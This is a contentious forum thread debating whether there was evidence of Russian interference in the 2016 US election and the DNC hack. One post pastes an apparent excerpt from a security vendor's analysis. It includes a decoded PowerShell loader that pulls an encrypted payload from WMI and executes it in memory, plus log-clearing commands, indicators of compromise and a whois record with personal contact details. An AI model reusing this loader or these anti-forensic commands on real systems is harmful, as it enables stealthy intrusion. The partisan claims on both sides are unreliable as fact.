jump to last post 1-2 of 2 discussions (15 posts)

Election Interference 2018 2020

  1. ptosis profile image77
    ptosisposted 5 days ago

    So why is it that although intel confirmed interference, politicos say that it did not change outcome? Then put a commision on voter fraud even tho critics say the investigation is a Republican voter suppression panel?

    There is 1 person I believe, Snowden, who said "I think the NSA almost certainly saw who the intruders were. Why wouldn’t they? But I am also convinced that they saw a lot of other attackers on there, too,” Mr. Snowden added.

    As many as six or seven separate actors may have infiltrated the DNC, Mr. Snowden suggested, calling it a “big target” with apparently lax security."

    http://m.washingtontimes.com/news/2017/ … um=twitter

    What do you think? Intel should show evidence? And how come I hear zero info on upgrading and securing state level election machines with paper trails?

    Perhaps the national parties want to keep it rigged and 'Ol Bone Spurs was right all along?

    Hey, even a stopped clock is right twice a day.

    1. wilderness profile image95
      wildernessposted 5 days ago in reply to this

      What, specific, "interference" has been found?  And what, specifically, was the result of that interference?

      So far all I've heard is many, many claims of Russian interference, but not a single, proven specific act.  It's past any point of believability to keep seeing claims but never, ever, any evidence.  (Outside, of course, of DNC interference in it's own primaries.)

  2. ptosis profile image77
    ptosisposted 5 days ago

    Exactly.  Almost 1 whole year since discovery.

    1. wilderness profile image95
      wildernessposted 5 days ago in reply to this

      Well, a year since claim, anyway.  No discovery to date.

      1. ptosis profile image77
        ptosisposted 5 days ago in reply to this

        That's just an opine trying to look like a fact.

        People reading this:
        Beware of bogus narratives and deliberate misinformation
        Since July 2016, the FBI has been investigating the Russian government’s attempt to influence the 2016 presidential election.

        "When it was discovered that the emails had been compromised, then-DNC Chairwoman Debbie Wasserman Schultz weirdly refused to allow forensic detectives from the FBI to examine the DNC server to probe the evidence of the theft. Why did the FBI accept that refusal?

        That strange behavior was not as bizarre as Wasserman Schultz's later frenzied efforts to protect her information technology specialist, Imran Awan, from Capitol Police and FBI investigations. Both agencies were hot on Awan's trail for allegedly unlawfully transferring secure data from government computers, and also for bank and federal procurement fraud." - http://www.chicagotribune.com/news/opin … story.html


        "CrowdStrike Services Inc., our Incident Response group, was called by the Democratic National Committee (DNC), the formal governing body for the US Democratic Party, to respond to a suspected breach. We deployed our IR team and technology and immediately identified two sophisticated adversaries on the network – COZY BEAR and FANCY BEAR. " https://www.crowdstrike.com/blog/bears- … committee/

        "Other companies independently discovered evidence that linked the attacks to the same culprit. SecureWorks found an improperly secured URL shortening account used by Fancy Bear while investigating other attacks by the group. That account contained evidence of nearly 4,000 phishing attacks Fancy Bear waged against Gmail addresses — the attack that ensnared Hillary Clinton campaign chairman John Podesta’s email account among them. " - http://thehill.com/policy/cybersecurity … ably-wrong

        1. wilderness profile image95
          wildernessposted 5 days ago in reply to this

          "Since July 2016, the FBI has been investigating the Russian government’s attempt to influence the 2016 presidential election."

          But the investigation hasn't found anything.  Which is what I said - no evidence to date.

          "Both agencies were hot on Awan's trail for allegedly unlawfully transferring secure data from government computers, and also for bank and federal procurement fraud."

          But no evidence of Russian involvement, or that the election was interfered with.  Which is what I said.

          "That account contained evidence of nearly 4,000 phishing attacks Fancy Bear waged against Gmail addresses — the attack that ensnared Hillary Clinton campaign chairman John Podesta’s email account among them."

          Again, no evidence of Russian involvement and no evidence the election was compromised.  Which is what I said.

          Bottom line: there is no evidence the Russians interfered with our election.  We assume they at least tried but can't even prove that.  So we keep making claims we can't support.

          1. ptosis profile image77
            ptosisposted 4 days ago in reply to this

            Nightmarish repetition there W. How do you KNOW there is no evidence to date? How to you KNOW that the evidence is not there? Are you part of the Deep State, and you're slumming it at HP?!?

            1. GA Anderson profile image84
              GA Andersonposted 4 days ago in reply to this

              Speaking of repetition ptosis, how do you know that the evidence is there?

              But, there may be a pending answer for all. The news is indicating that Mueller is near a break-through.

              1. ptosis profile image77
                ptosisposted 3 days ago in reply to this


                What are you saying?

                https://www.washingtonpost.com/news/fac … f99980b493

                http://www.politifact.com/truth-o-meter … mail-leak/

                https://www.vox.com/policy-and-politics … ws-hannity

                https://www.nytimes.com/2016/12/13/us/p … ml?mcubz=0

                https://www.wired.com/2016/07/heres-kno … -dnc-hack/

                https://www.nytimes.com/2016/12/20/insi … ml?mcubz=0

                http://time.com/4600177/election-hack-r … ald-trump/

                I can give you 1K+ more urls.

                What are you saying when you ask me "How do I know"?

                The only person on this forum who denies that there is no evidence is the bot wilderness.  Are you saying you also believe there is 'no evidence' and only 'investigations'?

                Are you saying that there is NO Fancy Bear?!?!

                1. wilderness profile image95
                  wildernessposted 3 days ago in reply to this

                  From your links:

                  "The U.S. government has not yet publicly named the culprit behind the DNC hack."
                  "Whether Russia hacked the DNC intending to affect the election remains unknown."
                  "DNC official allege that the Russian government is behind the breach."
                  "Julian Assange of Wikileaks gave a soft disavowal of claims that his whistleblowing organization is in cahoots with Russian intelligence, “Well, there is no proof of that whatsoever,” he said. “We have not disclosed our source, and of course, this is a diversion that's being pushed by the Hillary Clinton campaign.”
                  "If the allegations do prove correct, this is an unprecedented step for Russia. "
                  "If you’re unwilling to trust either camp <Russia hacked, Russia did not hack the DNC>, or if you want to find out if one side is acting in bad faith, you have little public information on which to form your own opinion."

                  If these are the types of things you're using to "prove" Russian interference in our election, you desperately need to go back to square one and start over. 

                  I have to say it's interesting (and comical) to see the claims, once more, change.  From Trump is tight with Putin, to Trump has connections in Russia, to someone in his party knows a Russian somewhere, to Russia fixed the election, to Russia hacked the DNC and told the true story of what was happening there.  A never ending witch hunt, with what is being hunted changing almost by the day when nothing can be found to prove the then-current allegations.  The desperation, and the denial that it's all a witch hunt, is almost as comical as the eternal insistence that there is something, somewhere and "we're gonna find it!".

                2. GA Anderson profile image84
                  GA Andersonposted 3 days ago in reply to this

                  ptosis, I didn't need to go through your links to find the facts, because I see that wilderness has done it for me. Which is not surprising - bots typically are very efficient.

                  Allegations and assumptions are not facts. Even if they do turn out to be true - until then they are still just allegations and assumptions.


                  1. ptosis profile image77
                    ptosisposted 3 days ago in reply to this

                    Yeah, I knew the links are never clicked on.

                    But you insist on seeing the actual code, figuring you do not how to program, I figured that would be a useless gesture also. Because I ALREADY DID THAT previously, and NOBODY commented on it. It was just like in the movie "IT", when people see something and then 'forget' it ever happened. and NEVER talk about it.

                    Wow, it's like a Cuban, mass brain aneurysm sonic disrupter coming straight outta of you all computers.

                    Repetition is HELL

                    https://www.dni.gov/files/documents/ICA_2017_01.pdf JAN 6 2017
                    You won't look at that - nope
                    https://www.crowdstrike.com/blog/bears- … committee/
                    you won't look at this neither! - Nope! nothing to see here - move along!

                    OK GA, W, since you are very good programmers and are experienced on computer forensics,  - I have NO IDEA, why you all wasting your talents here but here the stinking code.


                    This decodes to:

                    function perfCr($crTr, $data){
                    $ret = $null
                    $ms = New-Object System.IO.MemoryStream
                    $cs = New-Object System.Security.Cryptography.CryptoStream -ArgumentList @($ms, $crTr, [System.Security.Cryptography.CryptoStreamMode]::Write)
                    $cs.Write($data, 0, $data.Length)
                    $ret = $ms.ToArray()
                    return $ret
                    function decrAes($encData, $key, $iv)
                    $ret = $null
                    $prov = New-Object System.Security.Cryptography.RijndaelManaged
                    $prov.Key = $key
                    $prov.IV = $iv
                    $decr = $prov.CreateDecryptor($prov.Key, $prov.IV)
                    $ret = perfCr $decr $encData
                    return $ret
                    function sWP($cN, $pN, $aK, $aI)
                    if($cN -eq $null -or $pN -eq $null){return $false}
                    $wp = ([wmiclass]$cN).Properties[$pN].Value
                    $exEn = [Convert]::FromBase64String($wp)
                    $exDec = decrAes $exEn $aK $aI
                    $ex = [Text.Encoding]::UTF8.GetString($exDec)
                    if($ex -eq $null -or $ex -eq ”)
                    Invoke-Expression $ex
                    return $true
                    return $false
                    $aeK = [byte[]] (0xe7, 0xd6, 0xbe, 0xa9, 0xb7, 0xe6, 0x55, 0x3a, 0xee, 0x16, 0x79, 0xca, 0x56, 0x0f, 0xbc, 0x3f, 0x22, 0xed, 0xff, 0x02, 0x43, 0x4c, 0x1b, 0xc0, 0xe7, 0x57, 0xb2, 0xcb, 0xd8, 0xce, 0xda, 0x00)
                    $aeI = [byte[]] (0xbe, 0x7a, 0x90, 0xd9, 0xd5, 0xf7, 0xaa, 0x6d, 0xe9, 0x16, 0x64, 0x1d, 0x97, 0x16, 0xc0, 0x67)
                    sWP ‘Wmi’ ‘Wmi’ $aeK $aeI | Out-Null

                    This one-line powershell command, stored only in WMI database, establishes an encrypted connection to C2 and downloads additional powershell modules from it, executing them in memory. In theory, the additional modules can do virtually anything on the victim system. The encryption keys in the script were different on every system. Powershell version of credential theft tool MimiKatz was also used by the actors to facilitate credential acquisition for lateral movement purposes.

                    FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging. It was executed via rundll32 commands such as:

                    rundll32.exe “C:\Windows\twain_64.dll”
                    In addition, FANCY BEAR’s X-Tunnel network tunneling tool, which facilitates connections to NAT-ed environments, was used to also execute remote commands. Both tools were deployed via RemCOM, an open-source replacement for PsExec available from GitHub. They also engaged in a number of anti-forensic analysis measures, such as periodic event log clearing (via wevtutil cl System and wevtutil cl Security commands) and resetting timestamps of files.


                    Indicators of Compromise:

                    IOC    Adversary    IOC Type    Additional Info
                    6c1bce76f4d2358656132b6b1d471571820688ccdbaca0d86d0ca082b9390536    COZY BEAR    SHA256    pagemgr.exe (SeaDaddy implant)
                    b101cd29e18a515753409ae86ce68a4cedbe0d640d385eb24b9bbb69cf8186ae    COZY BEAR    SHA256    pagemgr.exe
                    (SeaDaddy implant)

                    185[.]100[.]84[.]134:443    COZY BEAR    C2    SeaDaddy implant C2
                    58[.]49[.]58[.]58:443    COZY BEAR    C2    SeaDaddy implant C2
                    218[.]1[.]98[.]203:80    COZY BEAR    C2    Powershell implant C2
                    187[.]33[.]33[.]8:80    COZY BEAR    C2    Powershell implant C2
                    fd39d2837b30e7233bc54598ff51bdc2f8c418fa5b94dea2cadb24cf40f395e5    FANCY BEAR    SHA256    twain_64.dll
                    (64-bit X-Agent implant)

                    4845761c9bed0563d0aa83613311191e075a9b58861e80392914d61a21bad976    FANCY BEAR    SHA256    VmUpgradeHelper.exe (X-Tunnel implant)
                    40ae43b7d6c413becc92b07076fa128b875c8dbb4da7c036639eccf5a9fc784f    FANCY BEAR    SHA256    VmUpgradeHelper.exe
                    (X-Tunnel implant)

                    185[.]86[.]148[.]227:443    FANCY BEAR    C2    X-Agent implant C2
                    45[.]32[.]129[.]185:443    FANCY BEAR    C2    X-Tunnel implant C2
                    23[.]227[.]196[.]217:443    FANCY BEAR    C2    X-Tunnel implant C2


                    I betcha you all don't even know what trace route or  ARIN lookup is neither.  Here some more gamma rayz for your brain cells to explode on:

                    arin:    arin
                    % This is the RIPE Database query service.
                    % The objects are in RPSL format.
                    % The RIPE Database is subject to Terms and Conditions.
                    % See http://www.ripe.net/db/support/db-terms-conditions.pdf

                    % Note: this output has been filtered.
                    %       To receive output for a database update, use the &quot;-B&quot; flag.

                    % Information related to ' -'

                    % Abuse contact for ' -' is 'abuse@yourserver.se'

                    inetnum: -
                    netname:        YOURSERVER-SE
                    descr:          Virtual Server hosting
                    country:        SE
                    admin-c:        MB43991-RIPE
                    tech-c:         MB43991-RIPE
                    status:         ASSIGNED PA
                    mnt-by:         YOURSERVER
                    created:        2015-09-06T16:26:02Z
                    last-modified:  2017-05-27T05:38:49Z
                    source:         RIPE

                    person:         Michael Bentov
                    address:        Yourserver SIA
                    address:        Ulbrokas 23, Riga, LV-1021, Latvia
                    phone:          +371 60001383
                    nic-hdl:        MB43991-RIPE
                    mnt-by:         YOURSERVER
                    created:        2017-05-18T21:01:59Z
                    last-modified:  2017-05-18T21:06:24Z
                    source:         RIPE

                    % Information related to ''

                    descr:          YOURSERVER-SE
                    origin:         AS52173
                    mnt-by:         Makonix
                    created:        2015-09-30T21:22:59Z
                    last-modified:  2015-09-30T21:22:59Z
                    source:         RIPE

                    % This query was served by the RIPE Database Query Service version 1.89.2 (ANGUS)

                    IP :
                    SERVER : hosted-by.yourserver.se
                    COUNTRY : Latvia


            2. wilderness profile image95
              wildernessposted 4 days ago in reply to this

              Wrong question.  You're the one claiming there IS interference...while producing nothing but investigations as proof the claim is true.  The right question is the one I've asked - where and what is the evidence supporting your claim.  Until it is shown the default is no known interference and thus no reason to make the claim.